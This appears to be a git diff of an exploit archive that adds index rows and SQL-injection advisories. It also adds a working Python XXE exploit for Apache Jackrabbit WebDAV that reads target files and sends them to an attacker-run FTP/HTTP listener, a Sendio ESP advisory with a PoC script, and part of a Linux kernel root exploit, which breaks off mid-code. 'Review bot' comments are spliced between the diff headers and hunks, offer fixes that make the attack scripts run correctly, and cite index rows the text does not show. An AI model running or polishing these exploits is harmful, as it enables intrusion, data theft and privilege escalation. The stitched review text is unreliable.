+37116,platforms/php/webapps/37116.py,"SilverStripe 2.4.7 install.php PHP Code Injection Vulnerability",2012-04-27,"Mehmet Ince",php,webapps,0
+37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0
+37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 'encode' Parameter Cross Site Scripting Vulnerability",2012-04-27,farbodmahini,php,webapps,0
+37119,platforms/asp/webapps/37119.txt,"XM Forum 'id' Parameter Multiple SQL Injection Vulnerabilities",2012-04-27,"Farbod Mahini",asp,webapps,0
+37120,platforms/php/webapps/37120.txt,"Uiga FanClub 'p' Parameter SQL Injection Vulnerability",2012-04-27,"Farbod Mahini",php,webapps,0
+37121,platforms/asp/webapps/37121.txt,"BBSXP CMS Multiple SQL Injection Vulnerabilities",2012-04-27,"Farbod Mahini",asp,webapps,0
+37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection Vulnerability",2012-04-28,eidelweiss,php,webapps,0
+37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting Vulnerability",2012-04-30,Am!r,php,webapps,0
+37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0
diff --git a/platforms/asp/webapps/37119.txt b/platforms/asp/webapps/37119.txt
new file mode 100755
index 000000000..35dae5c3d
--- /dev/null
+++ b/platforms/asp/webapps/37119.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53292/info
+
+XM Forum is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/[patch]/profile.asp?$sid=&id=[SQL]
+http://www.example.com/[patch]/forum.asp?$sid=&id=[SQL]
+http://www.example.com/[patch]/topic.asp?$sid=&id=[SQL]
\ No newline at end of file
diff --git a/platforms/asp/webapps/37121.txt b/platforms/asp/webapps/37121.txt
new file mode 100755
index 000000000..a15e231c5
--- /dev/null
+++ b/platforms/asp/webapps/37121.txt
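Review bot: The new row 37113 misspells the product as `Wordpess` and, together with rows 37111 and 37112, writes `Wordpress` where the surrounding context rows (37107–37109, 37123) use the canonical `WordPress`, so a name search on this index will miss these three entries. Suggested row: `37113,platforms/php/webapps/37113.txt,"WordPress Simple Photo Gallery 1.7.8 - Blind SQL Injection",2015-05-26,woodspeed,php,webapps,80`, and the same `WordPress` spelling in 37111 and 37112. Row 37110 also omits the identifier that its own file header carries (CVE-2015-1833); adding it or the fixed release named in that file to the description would make the index entry independently searchable.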
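Review bot: The three request URLs in this advisory use the placeholder `[patch]` where the installation path is meant, which reads as a typo of `[path]` and could be mistaken for a reference to a patch level; `http://www.example.com/[path]/profile.asp?$sid=&id=[SQL]` (and likewise for forum.asp and topic.asp) would be unambiguous. The text also names no affected version, which is the first thing a triager needs to scope this against an installation; the CSV row in this commit does not supply one either, so a `Version: not stated in source advisory` line in the file would at least make the gap explicit rather than silent. The `$sid=` parameter is sent empty in every URL without comment; if it is required for the request to reach the vulnerable query, a one-line note saying so would help whoever reproduces this.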
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/53298/info
+
+BBSXP CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/ShowPost.asp?ThreadID=[SQL]
+http://www.example.com/blog.asp?id=[SQL]
+http://www.example.com/ShowForum.asp?ForumID=[SQL]
+http://www.example.com/Profile.asp?UserName=[SQL]
+http://www.example.com/print.asp?id=[SQL]
\ No newline at end of file
diff --git a/platforms/java/webapps/37110.py b/platforms/java/webapps/37110.py
new file mode 100755
index 000000000..6ef02fd0b
--- /dev/null
+++ b/platforms/java/webapps/37110.py
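Review bot: This advisory file carries no affected version, no author and no date; all three exist only in the files.csv row added in the same commit (`2012-04-27`, `Farbod Mahini`), so the file does not stand on its own once copied out of the archive. A short header such as `# Exploit Title: BBSXP CMS Multiple SQL Injection Vulnerabilities`, `# Date: 2012-04-27`, `# Exploit Author: Farbod Mahini` above the `source:` line would fix that. Four of the five listed parameters (`ThreadID`, `id`, `ForumID`, `id`) look numeric while `Profile.asp?UserName=` presumably lands in a string-quoted query, so the injection syntax is unlikely to be identical across all five; a note that `[SQL]` is a placeholder and that the context differs per endpoint would save a reproducer some guesswork. The file also lacks a trailing newline, as the diff marker shows.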
@@ -0,0 +1,382 @@ +#!/usr/bin/env python +""" +# Exploit Title: Jackrabbit WebDAV XXE +# Date: 25-05-2015 +# Software Link: http://jackrabbit.apache.org/jcr/ +# Exploit Author: Mikhail Egorov +# Contact: 0ang3el () gmail com +# Website: http://0ang3el.blogspot.com +# CVE: CVE-2015-1833 +# Category: webapps + +1. Description + +Jackrabbit WebDAV plugin use insecurely configured XML parser to parse +incoming PROPPATCH and PROPFIND requests. As a result it is vulnerable to +XXE attacks. +Besides Jackrabbit JCR, WebDAV plugin is incorporated into the following +software: Apache Sling, Adobe AEM. + +2. Proof of Concept + +Download vulnerable Apache Sling launchpad web application from here - +https://sling.apache.org + +Start launchpad web application as follows: +root@kali:~/build-sling# java -jar +org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar + +Launch exploit with the following command: +root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe +--tech oob --ip 127.0.0.1 +enter command> get . + +loaded 210 bytes in buffer + +enter command> show + +apache-maven-3.0.5 +apache-maven-3.0.5-bin.tar.gz +derby.log +eclipse +hs_err_pid5379.log +org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar +python-workspace + +enter command> store /tmp/cwd.lst + +buffer content has been stored in file /tmp/cwd.lst + +enter command> exit +root@kali:~# + +Exploit have three exploitation techniques: +* inb1 - inbound XXE technique, it first writes content as attribute value +of controllable JCR node using PROPPATCH request and then retrieves content +using PROPFIND request +* inb2 - same as inb1, but there is some XML magic to retrieve content that +is not valid XML data +* oob - out-of-bound technique, utilizes FTP hack from this blog +http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html +Technique inb2 is the most stable. But it requires credentials of the user +that is able to modify some JCR node. 
Attacker host must have "visible ip" +which is required for communication between target and attacker's host. +Technique oob works even with anonymous credentials. But it is not so +stable as inb2 technique. +Technique inb1 does not require "visible ip", but there are limitations on +retrieved content. + +3. Solution: + +If you use Apache Jackrabbit, install version 2.10.1. +http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt +""" +from urllib2 import * +import sys, string, random +import base64 +import xml.etree.ElementTree as ET +import BaseHTTPServer, SimpleHTTPServer +from multiprocessing import Process, Value, Manager +from optparse import OptionParser +import socket, select + +usage= """ + %prog --url --tech inb1 [ --creds ] + + %prog --url --tech inb2 --ip [ --creds --hport ] + + %prog --url --tech oob --ip [ --creds --hport --fport ] +""" + +help_interpreter = """ + help - print this help. + + get - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing). + + show - show content of internal buffer. + + store - store internal buffer in file. + + exit - stop exploiting + """ + +failure_descr = """ +Possible reasons: + 1. Inappropriate technique, try another options. + 2. You do not have permissions to read file or list directory. + 3. Target is not exploitable. 
+""" + +rand_attr = '' +script_name = sys.argv[0].split('/')[-1] + +buffer_with_loot = '' + +url, tech, ip, creds, hport, fport = [None] * 6 + +http_server, ftp_server = [None] * 2 + +class HTTP_XXE(): + def __init__(self, ip, port, fport): + self.port = port + self.ip = ip + self.fport = fport + + def run(self): + class http_handler(BaseHTTPServer.BaseHTTPRequestHandler): + def __init__(self, ip, fport,*args): + self.ip = ip + self.fport = fport + BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args) + + def do_GET(self): + if "inb2" in self.path: + self.send_response(200) + self.send_header('Content-type','application/xml') + self.end_headers() + self.wfile.write('') + + if "oob" in self.path: + self.send_response(200) + self.send_header('Content-type','application/xml') + self.end_headers() + self.wfile.write('">%%all;' % {'ip' : self.ip, 'port' : self.fport}) + + def log_message(self, format, *args): # silent HTTP server + return + + def serve(httpd): + while True: + httpd.handle_request() + + handler = lambda *args: http_handler(self.ip, self.fport, *args) + httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler) + self.proc = Process(target = serve, args = (httpd,)) + self.proc.start() + + def stop(self): + self.proc.terminate() + +class FTP_XXE(): + def __init__(self, port): + self.port = port + + def run(self): + class ftp_handler(): + def __init__(self, port): + self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.server.setblocking(0) + self.server.bind(('0.0.0.0', port)) + self.server.listen(5) + + def serve(self, d): + inputs = [self.server] + while True: + readable, writable, exceptional = select.select(inputs, [], []) + + for s in readable: + if s is self.server: + connection, client_address = s.accept() + connection.setblocking(0) + inputs.append(connection) + + connection.send("220 xxe-ftp-server\n") + else: + data = s.recv(1024) + + if not data: + 
inputs.remove(s) + continue + + if "USER" in data: + s.send("331 password please - version check\n") + else: + s.send("230 more data please!\n") + if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]): + d['loot'] += data + + self.d = Manager().dict() + self.d['loot'] = '' + + ftpd = ftp_handler(self.port) + self.proc = Process(target = ftpd.serve, args=(self.d,)) + self.proc.start() + + def stop(self): + self.proc.terminate() + + def clean_buf(self): + self.d['loot'] = '' + + def get_loot(self): + loot = self.d['loot'] + + # clean data + loot = loot.replace('\r\nRETR ','/') + loot = loot.replace('\r\nCWD ','/') + loot = loot.replace('CWD ','',1) + loot = loot.replace('RETR ','',1) + + return loot + +def exploit(url, technique, creds = 'anonymous:anonymous'): + + global buffer_with_loot, rand_attr + + requests = { + 'inb1' : { + 'PROPPATCH' : ' ]> <%(attr_name)s>&loot; ', + 'PROPFIND': ' ' + }, + + 'inb2' : { + 'PROPPATCH' : ' "> %%dtd; ]> <%(attr_name)s>&all; ', + 'PROPFIND': ' ' + }, + + 'oob' : { + 'PROPFIND': ' %%dtd; %%send; ]> ' + } + } + + def request(url, verb, data, creds, timeout): + req = Request(url, data) + req.add_header('User-Agent', script_name) + req.add_header('Content-Type', 'application/xml') + req.add_header('Authorization', 'Basic ' + base64.b64encode(creds)) + req.get_method = lambda: verb + + #req.set_proxy('127.0.0.1:8081','http') ### For debug + + resp = None + try: + resp = urlopen(req, timeout = timeout).read() + except Exception, e: + pass + + return resp + + while 1: + cmdline = raw_input('\033[33menter command> \033[0m') + cmdline = re.sub('\s+', ' ', cmdline) + cmd = cmdline.split(' ')[0] + arg = cmdline.split(' ')[-1] + + if cmd not in ['help', 'get', 'show', 'store', 'exit']: + print '\n\033[36mno such command, use help for command list \033[0m\n' + continue + + if cmd == 'exit': + break + + if cmd == 'help': + print '\033[36m' + help_interpreter + '\033[0m' + continue + + if cmd == 'show': + print '\n\033[36m' + 
buffer_with_loot + '\033[0m' + continue + + if cmd == 'store': + with open(arg,'w') as outf: + outf.write(buffer_with_loot) + + print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n' + continue + + if cmd == 'get': + if arg.startswith('.'): + arg = '/proc/self/cwd' + arg[1:] + arg = 'file://' + arg + + rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content + + if technique == 'inb1': + request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg} + request(url, 'PROPPATCH', request1, creds, timeout = 30) + + request2 = requests['inb1']['PROPFIND'] + loot = request(url, 'PROPFIND', request2, creds, timeout = 30) + + try: + buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text + except: + buffer_with_loot = '' + + if technique == 'inb2': + request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport} + request(url, 'PROPPATCH', request1, creds, timeout = 30) + + request2 = requests['inb2']['PROPFIND'] + loot = request(url, 'PROPFIND', request2, creds, timeout = 30) + + try: + buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','') + except: + buffer_with_loot = '' + + if technique == 'oob': + request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport} + request(url, 'PROPFIND', request1, creds, timeout = 8) + + buffer_with_loot = ftp_server.get_loot() + + ftp_server.clean_buf() + + len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('') + print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_ + if not len_: + print '\033[36m' + failure_descr + '\033[0m' + + continue + +def parse_options(): + global url, tech, ip, creds, hport, fport + + parser = OptionParser(usage = usage) + parser.add_option('--url', dest = url, help = 'url parameter') + parser.add_option('--tech', dest = tech, help = 
'technique, valid values are: inb1, inb2, oob') + parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous') + parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access') + parser.add_option('--hport', dest = hport, help = 'port for HTTP server which will be launched during attack, default is 9998') + parser.add_option('--fport', dest = fport, help = 'port for FTP server which will be launched during attack, default is 9999') + + (options, args) = parser.parse_args() + + if not options.url or not options.tech: + print 'you must specify url and tech parameters' + sys.exit(2) + + if options.tech not in ['inb1', 'inb2', 'oob']: + print 'invalid tech parameter' + sys.exit(2) + + if options.tech != 'inb1' and not options.ip: + print 'you must specify ip parameter' + sys.exit(2) + + url = options.url + tech = options.tech + ip = options.ip + creds = options.creds if options.creds else 'anonymous:anonymous' + hport = options.hport if options.hport else 9998 + fport = options.fport if options.fport else 9999 + +parse_options() + +if tech != 'inb1': + http_server = HTTP_XXE(ip, hport, fport) + http_server.run() + + if tech == 'oob': + ftp_server = FTP_XXE(fport) + ftp_server.run() + +exploit(url, tech, creds) + +if tech != 'inb1': + http_server.stop() + +if tech == 'oob': + ftp_server.stop() \ No newline at end of file diff --git a/platforms/jsp/webapps/37114.txt b/platforms/jsp/webapps/37114.txt new file mode 100755 index 000000000..33595b826 --- /dev/null +++ b/platforms/jsp/webapps/37114.txt 
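Review bot: `re.sub` in the command loop of `exploit()` is used without an `import re` anywhere in the import block; it appears to work only because `from urllib2 import *` leaks urllib2's own `re` binding, which is not a stable interface. Add `import re` next to `import socket, select` so the script does not depend on that accident. Two other things look unintentional: `parser.add_option('--url', dest = url, ...)` (and the other `dest =` arguments) pass the module-level `None`, so optparse silently derives the destination from the option name — either drop `dest=` or pass the string names; and both helper listeners bind `0.0.0.0`, so the HTTP and FTP callback servers accept connections from any host rather than only the target, which is worth binding to the `--ip` address or at least documenting in the usage text.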
@@ -0,0 +1,145 @@ +1. Advisory Information + +Title: Sendio ESP Information Disclosure Vulnerability +Advisory ID: CORE-2015-0010 +Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability +Date published: 2015-05-22 +Date of last update: 2015-05-22 +Vendors contacted: Sendio +Release mode: Coordinated release + + +2. Vulnerability Information + +Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200] +Impact: Security bypass +Remotely Exploitable: Yes +Locally Exploitable: No +CVE Name: CVE-2014-0999, CVE-2014-8391 + + + +3. Vulnerability Description + +Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterprises. Two information disclosure issues were found affecting some versions of this software, and can lead to leakage of sensitive information such as user's session identifiers and/or user's email messages. + + +4. Vulnerable Packages + +Sendio 6 (14.1120.0) +Other products and versions might be affected too, but they were not tested. + + +5. Vendor Information, Solutions and Workarounds + +Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on Sendio software Version 7.2.4. + +For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not HTTPS web sessions. Sendio recommends that customers who have not upgraded to Version 7.2.4 should disallow HTTP on their Sendio product and only use HTTPS. + + +6. Credits + +This vulnerability was discovered and researched by Martin Gallo from Core Security's Consulting Services Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security's Advisories Team. + + +7. Technical Description / Proof of Concept Code + +7.1. Disclosure of session cookie in Web interface URLs + +The Sendio [1] ESP Web interface authenticates users with a session cookie named "jsessionid". 
The vulnerability [CVE-2014-0999] is caused due the way the Sendio ESP Web interface handles this authentication cookie, as the "jsessionid" cookie value is included in URLs when obtaining the content of emails. The URLs used by the application follow this format: + + + http://:/sendio/ice/cmd/msg/body;jsessionid=?id= + +This causes the application to disclose the session identifier value, allowing attackers to perform session hijacking. An attacker might perform this kind of attack by sending an email message containing links or embedded image HTML tags pointing to a controlled web site, and then accessing the victim's session cookies through the "Referrer" HTTP header. Accessing this authentication cookie might allow an attacker to hijack a victim's session and obtain access to email messages or perform actions on behalf of the victim. + +7.2. Response mixup in Web interface + +The vulnerability [CVE-2014-8391] is caused by an improper handling of users' sessions by the Web interface. Under certain conditions, this could lead to the server disclosing sensitive information that was intended for a different user. This information includes, for instance, other users' session identifiers, email message identifiers or email message subjects. In order to trigger this vulnerability, requests should be authenticated. 
+ +The following Python script can be used to trigger this vulnerability under certain circumstances: + + +import requests + +domain = "target.domain.com" # The target domain +port = 8888 # The target port +jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" # A valid jsessionid +num = 100000 # No of request to make +msgid = 9999999 # A valid message id to baseline the requests + +url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, jsessionid) + + +def make_request(id): + params = {"id": str(id)} + headers = {"Cookie": "JSESSIONID=%s" % jsessionid} + return requests.get(url, params=params, headers=headers) + + +print "[*] Reaching the target to define baseline" +r = make_request(msgid) +baseline_length = r.headers["content-length"] +print "[*] Defined baseline: %d bytes" % baseline_length + +for id in range(0, num): + r = make_request(msgid) + rlength = int(r.headers["content-length"]) + if r.status_code == 200 and rlength != baseline_length: + print "\t", r.status_code, rlength, r.text + else: + print "\t", r.status_code, rlength + + + +8. Report Timeline + +2015-03-26: Core Security sent an initial notification to Sendio informing them that multiple vulnerabilities were found in one of their products, and requested their PGP keys in order to start an encrypted communication. +2015-03-27: Sendio replied that they would not be able to use PGP keys, but stated that their In/out SMTP gateway uses TLS, so that should suffice. They detailed that they were working on a fix for the "CS_SENDIO_JSESSIONID_DISCLOSURE" vulnerability and estimated it would be released by the end of April, 2015. They requested additional technical details for the "CS_SENDIO_INFO_LEAK" vulnerability. +2015-03-30: Core Security informed that understood that Sendio may not be able to use PGP keys, but Core doesn't consider the use of TLS as a replacement for PGP. 
Core Security requested to receive confirmation from Sendio in case they wanted to keep the communications unencrypted with PGP in order to send them a draft version of the advisory. +2015-03-30: Sendio confirmed that the communication can remain "as is" without PGP. They will inform Core once they have a specific date for publishing the fix. Sendio requested a PoC for the "CS_SENDIO_INFO_LEAK vulnerability". +2015-03-31: Core Security sent a draft version of the advisory and PoC to Sendio. +2015-03-31: Sendio confirmed reception of the advisory and PoC and informed Core that they would provide an update on their test on April 6. +2015-04-06: Sendio informed Core that they were able to reproduce the "CS_SENDIO_INFO_LEAK" issue and that were still analyzing it in order to create a fix. +2015-04-07: Core Security requested an estimated date for the release of a fix/update. +2015-04-13: Core Security again requested an answer from Sendio regarding the release of a fix/update. +2015-04-13: Sendio informed Core they were still working on a fix for the JSession issue that covers all use cases across Microsoft Outlook and the various supported web browsers. For the "CS_SENDIO_INFO_LEAK" they had coded a fix that was undergoing a System Test. Sendio estimated the release would take place on May 15, 2015. +2015-04-20: Sendio informed Core they were still planning to release the fixes by May 15, 2015. +2015-04-20: Core Security thanked Sendio for the update and informed them they would schedule their security advisory accordingly. +2015-04-24: Core Security requested that Sendio delay the release date of the fixes until Monday, May 18 in order to avoid publishing them on a Friday. +2015-04-27: Sendio informed Core that many of their customers have their Sendio systems set to "automatically update" on weekends. Sendio requested Core publish their advisory a week after the fix is published. Sendio also requested the ability to add some workarounds into Core's advisory. 
+2015-04-28: Core Security informed Sendio that they understood their update policy and let them know that it is Core's policy to publish their advisory the same day the fix is released in order to inform the affected users of its availability. Core also stated that they were willing to add any workarounds Sendio proposed. +2015-05-05: Sendio informed Core that they were still having problems developing a fix for the JSession vulnerability, therefore they may have to postpone the release date from May 15 to May 22. +2015-05-07: Core Security thanked Sendio for the update and requested to be kept informed in order to have enough time to schedule their advisory. +2015-05-12: Sendio confirmed that they needed to delay the publication of the fixes until May 21. Additionally, Sendio sent Core the proposed workarounds to be added in Core's advisory and requested a draft copy of it. +2015-05-15: Core Security informed Sendio it would reschedule the publication of their advisory and would send them a draft copy of it once they produced the final version. +2015-05-20: Sendio informed Core that they would publish the fixes at 10 PM, May 21. +2015-05-20: Core Security informed Sendio that based on their publication time they would have to delay the release of the advisory until Friday 22. +2015-05-22: Advisory CORE-2015-0010 published. + + +9. References + +[1] http://www.sendio.com/. + + +10. About CoreLabs + +CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. 
CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. + + +11. About Core Security Technologies + +Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. + +Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. + + +12. Disclaimer + +The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ + + +13. PGP/GPG Keys + +This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. diff --git a/platforms/linux/local/1397.c b/platforms/linux/local/1397.c index a2d107be2..acb00a88f 100755 --- a/platforms/linux/local/1397.c +++ b/platforms/linux/local/1397.c 
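Review bot: The PoC script in section 7.2 fails before reaching the loop: `baseline_length = r.headers["content-length"]` is a string, so `print "[*] Defined baseline: %d bytes" % baseline_length` raises a TypeError, and even if that line were dropped the later `rlength != baseline_length` compares an int against a str, so every response would be reported as a mismatch. Convert once at the source: `baseline_length = int(r.headers["content-length"])`. The loop also always requests `msgid` rather than the loop variable `id`; if re-requesting the same message is deliberate (to catch a response meant for another session), a one-line comment saying so would stop readers from treating it as a typo. Finally, the script sends the session id both in the URL path and in the `Cookie` header over plain HTTP, which is exactly the exposure section 7.1 describes — acceptable for a PoC against a test appliance, but worth stating explicitly.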
@@ -1,730 +1,730 @@ -/* -* k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 -* Discovered and original exploit coded Jan 2005 by sd -* -********************************************************************* -* -* Modified 2005/9 by alert7 -* XFOCUS Security Team http://www.xfocus.org -* -* gcc -o k-rad3 k-rad3.c -static -O2 -* -* tested succeed : -* on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp) -* 2.6.9-5.EL ./k-rad3 -p 2 -* 2.6.9-5.ELsmp ./k-rad3 -a -p 7 -* on default installed maglic linux 1.2 -* MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2 -* -* thank watercloud tested maglic linux 1.2 -* thank eist provide RHEL4 to test -* thank sd share his stuff. -* thank xfocus & xfocus's firends -* -* -* TODO: -* CASE 1: use stack > 0xc0000000 -* CASE 2: CONFIG_X86_PAE define ,but cpu flag no pse -* -*[alert7@MagicLinux ~]$ ./k-rad3 -h -*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] -*[ Discovered Jan 2005 by sd ] -*[ Modified 2005/9 by alert7 ] -* -*Usage: ./k-rad3 -* -s forced cpu flag pse -* -a define CONFIG_X86_PAE,default none -* -e have two kernel code,default 0 -* -p alloc pages(4k) ,default 1. Increase from 1 to 7 -* The higher number the more likely it will crash -* -t default 0 -* 0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 -* -*[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2 -*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] -*[ Discovered Jan 2005 by sd ] -*[ Modified 2005/9 by alert7 ] -*[+] try open /proc/cpuinfo .. ok!! -*[+] find cpu flag pse in /proc/cpuinfo -*[+] CONFIG_X86_PAE :none -*[+] Cpu flag: pse ok -*[+] Exploit Way : 0 -*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n) -*[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 -*[+] idtr.base 0xc0461000 ,base 0xc0000000 -*[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196 -*[+] idt[0x7f] addr 0xffc003f8 -*[+] j00 1u(k7 k1d! 
-*[root@k-rad3 ~] #id -*uid=0(root) gid=0(root) groups=500(alert7) -* -* -* Linux Kernel <= 2.6.11 "sys_epoll_wait" Local integer overflow Exploit -* -* "it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) -* memory due to integer overflow in sys_epoll_wait and misuse of -* __put_user in ep_send_events" -* Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html -* -********************************************************************* -* -* -* In memory of pwned.c (uselib) -* -* - Redistributions of source code is not permitted. -* - Redistributions in the binary form is not permitted. -* - Redistributions of the above copyright notice, this list of conditions, -* and the following disclaimer is permitted. -* - By proceeding to a Redistribution and under any form of the Program -* the Distributor is granting ownership of his Resources without -* limitations to the copyright holder(s). -* -* -* Since we already owned everyone, theres no point keeping this private -* anymore. -* -* http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html -* -* Thanks to our internet hero georgi guninski for being such incredible -* whitehat disclosing one of the most reliable kernel bugs. -* You saved the world, man, we owe you one! -* -* This version is somewhat broken, but skilled reader will get an idea. -* Well, at least let the scriptkids have fun for a while. -* -* Thanks to all who helped me developing/testing this, you know who you are, -* and especially to my gf for guidance while coding this. 
-* -*/ - -#define _GNU_SOURCE - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#ifndef __USE_GNU - #define __USE_GNU -#endif -#include -#include -#include -#include - -/** - * Relationship Variables - * - * 1: CONFIG_X86_PAE - * see /lib/modules/`uname -r`/build/.config - * 1.1: pse - * 2: THREAD_SIZE - * see include/asm/thread_info.h THREAD_SIZE define - */ - - -#define MAP (0xfffff000 - (1023*4096)) -#define MAP_PAE (0xfffff000 - (511*4096)) -#define MKPTE(addr) ((addr & (~4095)) | 0x27) -#define MKPMD(x) (0x1e3|0x004) - -//////////////////////////////////////////////// - -#define KRADPS1 "k-rad3" - -#define kB * 1024 -#define MB * 1024 kB -#define GB * 1024 MB - -#define KRS "\033[1;30m[ \033[1;37m" -#define KRE "\033[1;30m ]\033[0m" -#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m " -#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m " -#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m " - -#define SET_IDT_GATE(idt,ring,s,addr) \ - (idt).off1 = addr & 0xffff; \ - (idt).off2 = addr >> 16; \ - (idt).sel = s; \ - (idt).none = 0; \ - (idt).flags = 0x8E | (ring << 5); - -//config val -static int havepse = 0; -static int definePAE = 0; -static int exploitway = 0; -static int npages = 1; -static int thread_size = 0; - - -static uid_t uid = 0; -static unsigned long long *clear1; -static char * progargv0; - -struct idtr { - unsigned short limit; - unsigned int base; -} __attribute__ ((packed)); - -struct idt { - unsigned short off1; - unsigned short sel; - unsigned char none,flags; - unsigned short off2; -} __attribute__ ((packed)); - - - -#define __syscall_return(type, res) \ -do { \ - if ((unsigned long)(res) >= (unsigned long)(-125)) { \ - errno = -(res); \ - res = -1; \ - } \ - return (type) (res); \ -} while (0) - - -#define _capget_macro(type,name,type1,arg1,type2,arg2) \ - type name(type1 arg1,type2 arg2) \ - { \ - long __res; \ - __asm__ volatile ( "int $0x80" \ - : "=a" (__res) \ - : "0" 
(__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ - __syscall_return(type,__res); \ - } - -static inline _capget_macro(int,capget,void *,a,void *,b); - -static int THREAD_SIZE_MASK =(-4096); - - -static void -fatal(const char *message) -{ - system("uname -a"); - printf("[-] %s\n",message); - exit(1); -} - -void kernel(unsigned * task) -{ - unsigned * addr = task; - /* looking for uids */ - - *clear1 = 0; - - while (addr[0] != uid || addr[1] != uid || - addr[2] != uid || addr[3] != uid - ) - addr++; - - addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */ - addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */ - -} - -void kcode(void); -void __kcode(void) -{ - asm( - "kcode: \n" - "cld \n" - " pusha \n" - " pushl %es \n" - " pushl %ds \n" - " movl %ss,%edx \n" - " movl %edx,%es \n" - " movl %edx,%ds \n"); - __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); - asm( - " andl %esp,%eax \n" - " pushl (%eax) \n" - " call kernel \n" - " addl $4, %esp \n" - " popl %ds \n" - " popl %es \n" - " popa \n" - " cli \n" - " iret \n" - ); -} - - -void raise_cap(unsigned long *ts) -{ -/* must be on lower addresses because of kernel arg check :) */ -static struct __user_cap_header_struct head; -static struct __user_cap_data_struct data; -static struct 